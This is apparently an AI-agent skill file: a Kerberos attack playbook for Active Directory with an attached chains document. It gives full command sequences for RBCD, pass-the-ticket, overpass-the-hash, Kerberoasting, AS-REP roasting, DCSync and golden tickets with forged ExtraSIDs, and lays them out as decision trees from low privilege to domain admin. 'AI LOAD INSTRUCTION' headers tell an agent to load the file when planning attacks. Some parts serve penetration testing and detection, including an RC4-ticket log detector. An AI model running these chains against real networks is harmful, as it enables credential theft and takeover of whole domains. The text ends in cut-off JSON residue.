```bash
# 1. Create or control a computer account (MAQ > 0)
addcomputer.py -computer-name 'FAKE$' -computer-pass 'P@ss123' -dc-ip DC_IP DOMAIN/user:password

# 2. Set RBCD on target
rbcd.py -delegate-from 'FAKE$' -delegate-to 'TARGET$' -dc-ip DC_IP -action write DOMAIN/user:password

# 3. S4U2Self + S4U2Proxy from controlled account
getST.py -spn cifs/TARGET.DOMAIN.COM -impersonate administrator DOMAIN/'FAKE$':'P@ss123' -dc-ip DC_IP

# 4. Use the ticket
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass DOMAIN/administrator@TARGET.DOMAIN.COM
```

Step 2 writes a security descriptor into the target's `msDS-AllowedToActOnBehalfOfOtherIdentity` whose DACL names `FAKE$`; step 3 succeeds because the KDC consults that attribute on `TARGET$` during S4U2Proxy. Caveats: if `ms-DS-MachineAccountQuota` is 0, step 1 fails and you need an account you already control that has an SPN; the impersonated user must not be in Protected Users or flagged "Account is sensitive and cannot be delegated", or the S4U2Self ticket will not be forwarded; and use the ticket filename getST.py prints, since newer Impacket releases name it `<user>@<spn>@<domain>.ccache` rather than `administrator.ccache`.

---

## 6. PASS-THE-TICKET & OVERPASS-THE-HASH

### Pass-the-Ticket

```bash
# Impacket — use .ccache ticket
export KRB5CCNAME=/path/to/ticket.ccache
psexec.py -k -no-pass DOMAIN/user@target.domain.com

# Mimikatz — inject .kirbi ticket into session
kerberos::ptt ticket.kirbi

# Rubeus
Rubeus.exe ptt /ticket:base64_ticket_blob
```

Address the target by the FQDN that matches the ticket's SPN (not an IP), or the ticket will not be selected. Impacket uses `.ccache`, Rubeus and Mimikatz use `.kirbi`; Impacket's `ticketConverter.py` converts between the two.

### Overpass-the-Hash (Pass-the-Key)

Use an NTLM hash (or AES key) to request a Kerberos TGT → pure Kerberos authentication, so no NTLM logon events are produced. The NT hash is literally the RC4-HMAC Kerberos key, which is why the hash alone suffices; the cost is that the resulting AS-REQ/TGT uses RC4 (etype 0x17), which stands out in 4768 events on a domain where users normally get AES tickets. When you have the AES256 key, prefer it (`getTGT.py -aesKey`, `Rubeus.exe asktgt /aes256:... /opsec`).

```bash
# Impacket
getTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache

# Rubeus (from Windows)
Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /ptt

# Mimikatz (needs local admin/SYSTEM; spawns a process whose logon session holds the key)
sekurlsa::pth /user:administrator /domain:DOMAIN.COM /ntlm:NTLM_HASH /run:cmd.exe
```

---

## 7. KERBEROS DOUBLE HOP PROBLEM

When authenticating via Kerberos across two hops (A → B → C), B holds only A's service ticket for B, not A's TGT, so B cannot obtain tickets to C on A's behalf by default.

### Solutions

| Method | How | Risk |
|---|---|---|
| CredSSP | Sends A's actual credentials to B | Credential exposure on B |
| Unconstrained delegation on B | A's TGT is forwarded to and cached on B | Over-privileged; B becomes a TGT harvesting point (§5) |
| Constrained delegation | B allowed to delegate to listed SPNs on C | Preferred: scoped to the listed services |
| RBCD | C's object lists B as allowed to act on behalf of others | Modern, flexible; configured on the resource side |
| Invoke-Command nested | `-Credential` param in nested session | Exposes password in script |

---
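The overpass-the-hash step in §6 works because the RC4-HMAC Kerberos key is the NT hash itself. The block below is an added example, not code from the original playbook: it derives that key from a password in pure Python (MD4 over UTF-16LE; hashlib's md4 is missing on many OpenSSL 3 builds, so it is implemented inline) and then shows the defender's side, flagging successful 4768 TGT requests whose encryption type is RC4 for accounts that are expected to get AES tickets. The 4768 records are constructed sample data and the AES-capable account list is an assumption about the environment.

```python
import struct

MASK32 = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (pure Python so it runs where hashlib.new('md4') is unavailable)."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK32

    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)           # bit length, little-endian

    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                            # round 1
            a = rotl((a + F(b, c, d) + X[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                            # round 2
            k = (i % 4) * 4 + i // 4
            a = rotl((a + G(b, c, d) + X[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                            # round 3
            a = rotl((a + H(b, c, d) + X[r3_order[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & MASK32, (B + b) & MASK32, (C + c) & MASK32, (D + d) & MASK32
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)). This value IS the RC4-HMAC Kerberos key (RFC 4757),
    so getTGT.py -hashes / Rubeus /rc4 can request a TGT without ever knowing the password."""
    return _md4(password.encode("utf-16le")).hex()


# Event 4768 TicketEncryptionType values (Windows security auditing reference)
ETYPE_NAMES = {0x1: "DES-CBC-CRC", 0x3: "DES-CBC-MD5", 0x11: "AES128-CTS-HMAC-SHA1-96",
               0x12: "AES256-CTS-HMAC-SHA1-96", 0x17: "RC4-HMAC", 0x18: "RC4-HMAC-EXP"}


def flag_rc4_tgt_requests(events, aes_capable_accounts):
    """Return successful 4768s that issued an RC4 TGT to an account that normally gets AES.
    Pass-the-key with an NT hash is forced to RC4, so on an AES-enabled domain such
    requests (often from a non-Windows source IP) are the telltale sign."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("Status", "0x0") != "0x0":
            continue                                   # failures (e.g. 0x18 bad key) are a different hunt
        etype = int(ev["TicketEncryptionType"], 16)
        user = ev["TargetUserName"].lower()
        if etype in (0x17, 0x18) and user in aes_capable_accounts:
            hits.append({"user": user, "etype": ETYPE_NAMES[etype], "src": ev["IpAddress"]})
    return hits


# Constructed sample 4768 records (field names as in the event XML; values invented)
SAMPLE_4768 = [
    {"EventID": 4768, "TargetUserName": "alice", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.0.0.21"},
    {"EventID": 4768, "TargetUserName": "administrator", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.0.99"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.0.40"},
    {"EventID": 4768, "TargetUserName": "bob", "TicketEncryptionType": "0x17", "Status": "0x18", "IpAddress": "::ffff:10.0.0.77"},
]
# Assumption: these accounts have AES enabled; svc_legacy is RC4-only by design and is excluded
AES_CAPABLE = {"alice", "administrator", "bob"}

if __name__ == "__main__":
    print(nt_hash("password"))            # 8846f7eaee8fb117ad06bdd830b7586c
    for hit in flag_rc4_tgt_requests(SAMPLE_4768, AES_CAPABLE):
        print("RC4 TGT for AES-capable account:", hit)
```

The same `nt_hash()` output is what `sekurlsa::pth /ntlm:` and `getTGT.py -hashes :` consume; the detection rule is deliberately narrow (successful issuance, RC4 etype, AES-capable target) so that legacy service accounts do not drown the signal.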
## 8. KERBEROS ATTACK DECISION TREE

```
AD environment — targeting Kerberos
│
├── Have domain user creds?
│   ├── Kerberoast → crack service account hashes (§3)
│   ├── Enumerate users without preauth → AS-REP roast (§2)
│   ├── Enumerate delegation → unconstrained/constrained/RBCD (§5)
│   └── Enumerate SPNs for high-value accounts
│
├── Have service account hash?
│   ├── Silver ticket for that service (§4)
│   └── If constrained delegation → S4U2Proxy chain (§5)
│
├── Have krbtgt hash?
│   ├── Golden ticket → any user, any service (§4)
│   ├── Diamond ticket → stealthier forging (§4)
│   └── Sapphire ticket → hardest to detect (§4)
│
├── Compromised host with unconstrained delegation?
│   ├── Monitor for incoming TGTs (Rubeus monitor)
│   ├── Coerce DC authentication (PrinterBug/PetitPotam)
│   └── Capture DC TGT → DCSync
│
├── Can write to target's msDS-AllowedToActOnBehalfOfOtherIdentity?
│   └── RBCD attack (§5) → create machine account + delegate
│
├── Have NTLM hash but need Kerberos auth?
│   └── Overpass-the-Hash → request TGT (§6)
│
└── Have .kirbi / .ccache ticket?
    └── Pass-the-Ticket → use directly (§6)
```

---

Attachment: KERBEROS_ATTACK_CHAINS.md

# Kerberos Multi-Step Attack Chains

> **AI LOAD INSTRUCTION**: Load this for end-to-end Kerberos attack chains that combine multiple AD techniques. Assumes the main [SKILL.md](./SKILL.md) is already loaded for individual Kerberos attacks. Use when planning multi-step attack paths from initial foothold to domain admin.

---
## 1. CHAIN: KERBEROAST → CONSTRAINED DELEGATION → DOMAIN ADMIN

### Scenario
Low-privilege domain user → cracked service account → delegation abuse → DA.

```
Step 1: Kerberoast
│   GetUserSPNs.py DOMAIN/lowpriv:password -dc-ip DC -request
│   hashcat -m 13100 tgs.txt wordlist.txt
│   → Cracked: svc_backup / P@ssw0rd2024
│
Step 2: Enumerate delegation
│   findDelegation.py DOMAIN/svc_backup:P@ssw0rd2024 -dc-ip DC
│   → svc_backup has constrained delegation to cifs/DC01.domain.com
│
Step 3: S4U2Self + S4U2Proxy
│   getST.py -spn cifs/DC01.domain.com -impersonate administrator DOMAIN/svc_backup:P@ssw0rd2024
│
Step 4: Access DC as administrator
│   export KRB5CCNAME=administrator.ccache
│   secretsdump.py -k -no-pass DC01.domain.com
│   → Domain hashes dumped
```

Step 3 as written needs protocol transition on svc_backup (TrustedToAuthForDelegation; findDelegation.py shows it in the DelegationType column). With plain constrained delegation, S4U2Self returns a non-forwardable ticket and S4U2Proxy is refused unless you already hold a forwardable ticket from the user you impersonate. Use the ccache filename getST.py prints.

---

## 2. CHAIN: RBCD + KERBEROS → LATERAL MOVEMENT

### Scenario
Write access to a computer's `msDS-AllowedToActOnBehalfOfOtherIdentity` → RBCD → lateral to that host.

```
Step 1: Identify writable computer object
│   (via BloodHound: GenericWrite on TARGET$)
│
Step 2: Create machine account
│   addcomputer.py -computer-name 'EVIL$' -computer-pass 'Passw0rd!' DOMAIN/user:pass -dc-ip DC
│
Step 3: Set RBCD
│   rbcd.py -delegate-from 'EVIL$' -delegate-to 'TARGET$' -action write DOMAIN/user:pass -dc-ip DC
│
Step 4: S4U chain
│   getST.py -spn cifs/TARGET.domain.com -impersonate administrator DOMAIN/'EVIL$':'Passw0rd!' -dc-ip DC
│
Step 5: Use ticket
│   export KRB5CCNAME=administrator.ccache
│   psexec.py -k -no-pass TARGET.domain.com
```

Step 2 depends on `ms-DS-MachineAccountQuota` (default 10); if it is 0, delegate from an account with an SPN that you already control. The impersonated user must not be in Protected Users or marked "sensitive and cannot be delegated". Creating a computer account logs 4741 and the attribute write logs 5136 (when directory-service change auditing is on), so remove the descriptor (`rbcd.py -action remove`) and the machine account when done.

---

## 3. CHAIN: UNCONSTRAINED DELEGATION + PRINTERBUG → DCSYNC

### Scenario
Compromised host with unconstrained delegation → coerce DC → capture DC TGT → DCSync.

```
Step 1: Confirm unconstrained delegation
│   Get-DomainComputer -Unconstrained (via PowerView)
│   → WEBSRV01.domain.com has unconstrained delegation
│
Step 2: Start Rubeus monitor on WEBSRV01
│   Rubeus.exe monitor /interval:5 /nowrap /targetuser:DC01$
│
Step 3: Coerce DC authentication
│   # From any domain machine, trigger PrinterBug:
│   SpoolSample.exe DC01.domain.com WEBSRV01.domain.com
│   # Or PetitPotam:
│   PetitPotam.py WEBSRV01.domain.com DC01.domain.com
│
Step 4: Capture DC01$ TGT from Rubeus output
│   Rubeus.exe ptt /ticket:base64_DC01_TGT
│
Step 5: DCSync with DC machine ticket
│   mimikatz # lsadump::dcsync /domain:domain.com /user:krbtgt
│   → krbtgt hash obtained → golden ticket capability
```

Rubeus monitor must run elevated on WEBSRV01 to read other logon sessions' tickets. PrinterBug needs the Print Spooler service running on DC01; the unauthenticated PetitPotam trigger was patched in August 2021 (CVE-2021-36942), but authenticated EFSRPC coercion still works. The captured DC01$ TGT is usable for DCSync because domain controllers hold replication rights by design.

---

## 4. CHAIN: AS-REP ROAST → ACL ABUSE → DCSYNC

### Scenario
No creds initially → AS-REP roast → cracked user has DCSync rights via ACL path.

```
Step 1: Enumerate users without preauth (no creds needed)
│   GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC -format hashcat
│   → $krb5asrep$23$svc_monitor@DOMAIN:...
│
Step 2: Crack AS-REP hash
│   hashcat -m 18200 asrep.txt wordlist.txt
│   → svc_monitor / Welcome2024!
│
Step 3: BloodHound enumeration
│   bloodhound-python -d domain.com -u svc_monitor -p 'Welcome2024!' -c all -dc DC01
│   → svc_monitor has GenericAll on IT-ADMINS group
│   → IT-ADMINS group has DCSync rights
│
Step 4: Add self to IT-ADMINS
│   net rpc group addmem "IT-ADMINS" svc_monitor -U DOMAIN/svc_monitor -S DC01
│
Step 5: DCSync
│   secretsdump.py DOMAIN/svc_monitor:'Welcome2024!'@DC01
│   → All domain hashes
```

Step 1 produces a 4768 with Pre-Authentication Type 0 for each roasted user, and step 4 logs a group-membership change (4728/4732); step 5 works immediately because secretsdump authenticates fresh rather than reusing an old token. Passwords containing `!` are single-quoted to stop bash history expansion.

---
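Chains 1 and 4 (and §2/§3 of SKILL.md) both end with a hash file to crack, and the first triage question is which lines are RC4 and which are AES, because that decides the hashcat mode and how long cracking will take. The block below is an added example, not code from the original document: a parser for the hashcat-format lines GetUserSPNs.py, Rubeus and GetNPUsers.py emit, which drops duplicate tickets for the same account, orders RC4 first and buckets lines by hashcat mode. The sample lines are constructed placeholders with shortened hex fields, not real captures; the AES AS-REP mode number (32100) is the one hashcat added in 6.2.6.

```python
HASHCAT_MODE = {("TGS", 23): 13100, ("TGS", 17): 19600, ("TGS", 18): 19700,
                ("ASREP", 23): 18200, ("ASREP", 17): 32100, ("ASREP", 18): 32100}


def parse_roast_line(line: str) -> dict:
    """Parse one $krb5tgs$ / $krb5asrep$ line into kind, etype, user, realm, spn, hashcat mode."""
    line = line.strip()
    if not line.startswith("$krb5"):
        raise ValueError("not a Kerberos roast hash: %r" % line[:20])
    f = line.split("$")                    # f[1] = krb5tgs|krb5asrep, f[2] = etype
    kind = "TGS" if f[1] == "krb5tgs" else "ASREP"
    etype = int(f[2])
    if kind == "TGS" and etype == 23:
        # $krb5tgs$23$*user$REALM$spn*$checksum$edata
        user, realm, spn = f[3].lstrip("*"), f[4], f[5].rstrip("*")
    elif kind == "TGS":
        # Impacket: $krb5tgs$17$user$REALM$*spn*$checksum$edata ; hashcat's own sample omits *spn*
        user, realm = f[3], f[4]
        spn = f[5].strip("*") if f[5].startswith("*") else None
    elif etype == 23:
        # $krb5asrep$23$user@REALM:checksum$edata
        user, realm = f[3].split(":", 1)[0].split("@", 1)
        spn = None
    else:
        # $krb5asrep$18$user$REALM$checksum$edata
        user, realm, spn = f[3], f[4], None
    return {"kind": kind, "etype": etype, "user": user, "realm": realm, "spn": spn,
            "mode": HASHCAT_MODE.get((kind, etype)), "hash": line}


def triage(lines):
    """Parse all lines, keep one ticket per (kind, account), RC4 (etype 23) first."""
    seen, out = set(), []
    for ln in lines:
        if not ln.strip() or ln.startswith("#"):
            continue
        entry = parse_roast_line(ln)
        key = (entry["kind"], entry["user"].lower(), entry["realm"].lower())
        if key in seen:                    # a second SPN for the same account adds nothing to cracking
            continue
        seen.add(key)
        out.append(entry)
    out.sort(key=lambda e: (e["etype"] != 23, e["kind"], e["user"].lower()))
    return out


def group_by_mode(entries):
    """Bucket hash lines by hashcat mode; write each bucket to a file and run hashcat -m <mode> on it."""
    buckets = {}
    for e in entries:
        buckets.setdefault(e["mode"], []).append(e["hash"])
    return buckets


# Constructed sample output (hex fields shortened; not real tickets)
SAMPLE = """\
$krb5tgs$23$*svc_backup$DOMAIN.COM$cifs/dc01.domain.com*$aabbccddeeff00112233445566778899$0011223344556677
$krb5tgs$18$svc_sql$DOMAIN.COM$*MSSQLSvc/db.domain.com:1433*$aabbccddeeff001122334455$0011223344556677
$krb5tgs$23$*svc_backup$DOMAIN.COM$http/dc01.domain.com*$99887766554433221100ffeeddccbbaa$7766554433221100
$krb5asrep$23$svc_monitor@DOMAIN.COM:aabbccddeeff00112233445566778899$0011223344556677
$krb5tgs$17$svc_web$DOMAIN.COM$aabbccddeeff001122334455$0011223344556677
"""

if __name__ == "__main__":
    for e in triage(SAMPLE.splitlines()):
        print("%-5s etype=%-2d mode=%-5s %s@%s %s" % (e["kind"], e["etype"], e["mode"],
                                                    e["user"], e["realm"], e["spn"] or ""))
```

An AES ticket for an account whose password is in a wordlist still cracks; it just costs orders of magnitude more per candidate, which is why the RC4 bucket runs first and why `Rubeus.exe kerberoast /rc4opsec` limits requests to accounts that do not support AES.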
## 5. CHAIN: TARGETED KERBEROAST VIA ACL

### Scenario
GenericWrite on a user → set SPN → kerberoast → crack password.

```
Step 1: Identify GenericWrite permission
│   BloodHound: user "lowpriv" has GenericWrite on "svc_admin"
│
Step 2: Set SPN on target user (targeted kerberoasting)
│   # PowerView
│   Set-DomainObject -Identity svc_admin -Set @{serviceprincipalname='fake/service'}
│   # Or addspn.py (from krbrelayx, not Impacket)
│   addspn.py -u DOMAIN/lowpriv -p password -t svc_admin -s fake/service DC01
│
Step 3: Kerberoast the target
│   GetUserSPNs.py DOMAIN/lowpriv:password -dc-ip DC01 -request-user svc_admin
│
Step 4: Crack and clean up
│   hashcat -m 13100 tgs.txt wordlist.txt
│   # Remove the fake SPN
│   Set-DomainObject -Identity svc_admin -Clear serviceprincipalname
```

The SPN you set must be unique in the forest or the DC rejects the write. `-Clear serviceprincipalname` wipes every SPN on the object; if svc_admin already had SPNs, record them first and restore them instead (and if it already had one, skip step 2 entirely and roast it as-is). The attribute write leaves a 5136 event when directory-service change auditing is configured.

---

## 6. CHAIN: GOLDEN TICKET → CROSS-DOMAIN ESCALATION

### Scenario
Compromised child domain → golden ticket with SID history → enterprise admin in parent domain.

```
Step 1: Obtain child domain krbtgt hash
│   secretsdump.py CHILD/administrator@childDC -just-dc-user krbtgt
│
Step 2: Get parent domain SID and Enterprise Admins group RID
│   lookupsid.py PARENT/user:pass@parentDC 0
│   → Parent Domain SID: S-1-5-21-PARENT...
│   → Enterprise Admins RID: 519
│
Step 3: Forge golden ticket with SID history (ExtraSIDs)
│   ticketer.py -nthash KRBTGT_HASH \
│       -domain-sid S-1-5-21-CHILD... \
│       -domain CHILD.PARENT.COM \
│       -extra-sid S-1-5-21-PARENT...-519 \
│       administrator
│
Step 4: Access parent domain DC
│   export KRB5CCNAME=administrator.ccache
│   psexec.py -k -no-pass PARENT.COM/administrator@parentDC
```

This works because SID filtering is not applied on intra-forest (parent/child) trusts, so the Enterprise Admins SID carried in the forged ticket's ExtraSIDs survives the referral into the parent. Enterprise Admins (RID 519) exists only in the forest root, which is why the parent's domain SID is needed; the parent's Domain Admins (RID 512) works the same way. SID filtering/quarantine, on by default for external and forest trusts, is what stops the equivalent trick across forests.

---
## 7. CHAIN: SHADOW CREDENTIALS + KERBEROS

### Scenario
GenericWrite on user → Shadow Credentials → certificate-based auth → TGT.

```
Step 1: Identify GenericWrite on target user/computer
│   BloodHound path analysis
│
Step 2: Add shadow credential (msDS-KeyCredentialLink)
│   # Whisker (Windows)
│   Whisker.exe add /target:svc_admin /domain:domain.com /dc:DC01
│   → Certificate and device ID generated
│
│   # pyWhisker (Linux)
│   pywhisker.py -d domain.com -u lowpriv -p password --target svc_admin --action add --dc-ip DC01
│
Step 3: Use certificate to get TGT (PKINIT)
│   Rubeus.exe asktgt /user:svc_admin /certificate:cert.pfx /password:certpass /ptt
│
│   # Or with PKINITtools
│   gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass certpass DOMAIN/svc_admin tgt.ccache
│
Step 4: Use TGT for further attacks
│   export KRB5CCNAME=tgt.ccache
│   # Now act as svc_admin
```

Key Trust needs at least one Windows Server 2016 DC, and step 3 needs a DC that can perform PKINIT (one holding a Domain Controller or Kerberos Authentication certificate). The TGT from step 3 can be turned into svc_admin's NT hash with PKINITtools `getnthash.py` (U2U), which feeds the overpass-the-hash and silver-ticket techniques in SKILL.md. Remove the key afterwards with the `remove` action of Whisker/pyWhisker; the attribute write is visible as a 5136 event when auditing is configured.

---

## 8. ATTACK CHAIN SELECTION GUIDE

```
What access do you have?
│
├── No domain creds
│   ├── Username list available? → AS-REP Roast (Chain 4)
│   └── Network access only? → NTLM relay → see ntlm-relay-coercion
│
├── Low-privilege domain user
│   ├── Kerberoastable SPNs found? → Kerberoast chain (Chain 1)
│   ├── GenericWrite on user? → Targeted Kerberoast (Chain 5) or Shadow Creds (Chain 7)
│   ├── GenericWrite on computer? → RBCD (Chain 2)
│   └── Host with unconstrained delegation? → PrinterBug chain (Chain 3)
│
├── Service account compromised
│   ├── Has constrained delegation? → S4U chain (Chain 1)
│   └── No delegation? → Silver ticket for specific service
│
├── Domain Admin in child domain
│   └── Want parent domain?
→ Golden ticket + ExtraSIDs (Chain 6)\n│\n└── Have krbtgt hash\n ├── Golden ticket (basic persistence)\n ├── Diamond ticket (evasive persistence)\n └── Sapphire ticket (hardest to detect)\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":7380,"content_sha256":"32bd31082daa7ae56291acde2b1d59e1199c041c5b35c6c8da19f63926db1ed5"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"SKILL: Kerberos Attack Playbook — Expert AD Attack Guide","type":"text"}]},{"type":"blockquote","content":[{"type":"paragraph","content":[{"text":"AI LOAD INSTRUCTION","type":"text","marks":[{"type":"strong"}]},{"text":": Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs.","type":"text"}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"0. 
RELATED ROUTING","type":"text"}]},{"type":"paragraph","content":[{"text":"Before going deep, consider loading:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"active-directory-acl-abuse","type":"text","marks":[{"type":"link","attrs":{"href":"../active-directory-acl-abuse/SKILL.md","title":null}}]},{"text":" for ACL-based AD attacks often chained with Kerberos","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"active-directory-certificate-services","type":"text","marks":[{"type":"link","attrs":{"href":"../active-directory-certificate-services/SKILL.md","title":null}}]},{"text":" for ADCS-based persistence (golden certificate)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"ntlm-relay-coercion","type":"text","marks":[{"type":"link","attrs":{"href":"../ntlm-relay-coercion/SKILL.md","title":null}}]},{"text":" for NTLM relay attacks that complement Kerberos abuse","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"windows-lateral-movement","type":"text","marks":[{"type":"link","attrs":{"href":"../windows-lateral-movement/SKILL.md","title":null}}]},{"text":" after obtaining tickets for lateral movement","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Advanced Reference","type":"text"}]},{"type":"paragraph","content":[{"text":"Also load ","type":"text"},{"text":"KERBEROS_ATTACK_CHAINS.md","type":"text","marks":[{"type":"link","attrs":{"href":"./KERBEROS_ATTACK_CHAINS.md","title":null}}]},{"text":" when you need:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Multi-step attack chains combining Kerberos with ACL abuse, ADCS, and relay","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"End-to-end scenarios from foothold to domain 
admin","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Chained delegation attack flows","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"1. KERBEROS AUTHENTICATION PRIMER","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Client KDC (DC) Service\n │ │ │\n │── AS-REQ ────────→│ │ (1) Request TGT with user creds\n │←─ AS-REP ─────────│ │ (2) Receive TGT (encrypted with krbtgt hash)\n │ │ │\n │── TGS-REQ ───────→│ │ (3) Present TGT, request service ticket\n │←─ TGS-REP ────────│ │ (4) Receive TGS (encrypted with service hash)\n │ │ │\n │── AP-REQ ─────────────────────────────→│ (5) Present TGS to service\n │←─ AP-REP ──────────────────────────────│ (6) Mutual auth (optional)","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"2. AS-REP ROASTING","type":"text"}]},{"type":"paragraph","content":[{"text":"Users with \"Do not require Kerberos preauthentication\" can be queried for AS-REP without knowing their password.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Enumerate Vulnerable Users","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket — from Linux\nGetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP -format hashcat -outputfile asrep.txt\n\n# Impacket — with domain creds (enumerate automatically)\nGetNPUsers.py DOMAIN/user:password -dc-ip DC_IP -request\n\n# Rubeus — from Windows (domain-joined)\nRubeus.exe asreproast /format:hashcat /outfile:asrep.txt\n\n# PowerView — enumerate users\nGet-DomainUser -PreauthNotRequired | Select-Object samaccountname","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Crack AS-REP Hash","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Hashcat mode 
18200\nhashcat -m 18200 asrep.txt rockyou.txt --rules-file best64.rule\n\n# John\njohn asrep.txt --wordlist=rockyou.txt","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"3. KERBEROASTING","type":"text"}]},{"type":"paragraph","content":[{"text":"Any domain user can request TGS for accounts with SPNs. The TGS is encrypted with the service account's NTLM hash.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Request Service Tickets","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket\nGetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request -outputfile tgs.txt\n\n# Rubeus (from Windows)\nRubeus.exe kerberoast /outfile:tgs.txt\n\n# Rubeus — target specific SPN / high-value accounts\nRubeus.exe kerberoast /user:svc_sql /outfile:tgs_sql.txt\n\n# PowerView + manual request\nGet-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname\nAdd-Type -AssemblyName System.IdentityModel\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"MSSQLSvc/db.domain.com\"","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Crack TGS Hash","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Hashcat mode 13100 (RC4) or 19700 (AES)\nhashcat -m 13100 tgs.txt rockyou.txt --rules-file best64.rule\n\n# RC4 tickets crack much faster than AES256 — target RC4 if possible\n# Rubeus: /tgtdeleg forces RC4 on some configs\nRubeus.exe kerberoast /tgtdeleg","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"4. 
TICKET FORGING — GOLDEN, SILVER, DIAMOND, SAPPHIRE","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Golden Ticket","type":"text"}]},{"type":"paragraph","content":[{"text":"Forge TGT using the ","type":"text"},{"text":"krbtgt","type":"text","marks":[{"type":"code_inline"}]},{"text":" hash → impersonate any user, including non-existent ones.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket — forge golden ticket\nticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain DOMAIN.COM administrator\n\n# Mimikatz\nkerberos::golden /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /krbtgt:KRBTGT_HASH /ptt\n\n# Rubeus\nRubeus.exe golden /rc4:KRBTGT_HASH /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /ptt","type":"text"}]},{"type":"paragraph","content":[{"text":"Prerequisites","type":"text","marks":[{"type":"strong"}]},{"text":": krbtgt NTLM hash (from DCSync or NTDS.dit) ","type":"text"},{"text":"Persistence","type":"text","marks":[{"type":"strong"}]},{"text":": Valid until krbtgt password is changed ","type":"text"},{"text":"twice","type":"text","marks":[{"type":"strong"}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Silver Ticket","type":"text"}]},{"type":"paragraph","content":[{"text":"Forge TGS using the service account's hash → access specific service only, no KDC interaction.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket — forge silver ticket for CIFS (file share)\nticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain DOMAIN.COM -spn cifs/target.domain.com administrator\n\n# Mimikatz\nkerberos::golden /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... 
